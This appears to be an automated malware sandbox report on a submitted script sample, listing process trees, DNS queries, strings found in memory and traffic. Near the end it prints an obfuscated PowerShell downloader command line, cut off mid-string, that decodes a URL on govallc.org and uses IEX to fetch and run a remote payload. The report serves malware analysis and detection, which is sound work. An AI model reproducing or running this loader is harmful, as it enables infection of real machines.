Source: Submited Sample |
Integrated Neural Analysis Model: Matched 98.8% probability |
Source: |
Binary string: m.Core.pdb source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4CFC000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb@c source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4CCD000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ows\dll\System.pdb source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4CFC000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ion.pdb source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4D29000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: *n.pdb source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4D29000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbN source: powershell.exe, 0000000B.00000002.2594834506.000002A2DD294000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000B.00000002.2570430275.000002A2C3142000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping aszzzw_6777.6777.6777.677e |
Source: unknown |
DNS traffic detected: query: aszzzw_6777.6777.6777.677e replaycode: Name error (3) |
Source: unknown |
DNS traffic detected: query: govallc.org replaycode: Name error (3) |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
DNS traffic detected: DNS query: aszzzw_6777.6777.6777.677e |
Source: global traffic |
DNS traffic detected: DNS query: govallc.org |
Source: powershell.exe, 0000000B.00000002.2591792743.000002A2D4F76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2591792743.000002A2D4E34000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000000B.00000002.2571576679.000002A2C4FE7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 0000000B.00000002.2571576679.000002A2C4DC1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 0000000B.00000002.2571576679.000002A2C4FE7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 0000000B.00000002.2571576679.000002A2C4DC1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 0000000B.00000002.2591792743.000002A2D4E34000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000000B.00000002.2591792743.000002A2D4E34000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000000B.00000002.2591792743.000002A2D4E34000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 0000000B.00000002.2571576679.000002A2C4FE7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 0000000B.00000002.2571576679.000002A2C6598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5C93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5F40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C56A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C6514000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C6360000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C66B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C6774000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5A10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5D57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C4FE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C543F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C63FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C65E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C69B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C52F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C6813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5E3E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://govallc.org |
Source: powershell.exe, 0000000B.00000002.2571576679.000002A2C4FE7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://govallc.org/redningsblternes.asiP |
Source: powershell.exe, 0000000B.00000002.2591792743.000002A2D4F76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2591792743.000002A2D4E34000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping aszzzw_6777.6777.6777.677e |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If ($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst; for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd. B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3 Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus 'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr idtnM,dheCervs oma.Sou.aAsylsCan iOstr ';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus ' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT Picy,efrpLnkorUdstoMaantBiltORomaCa |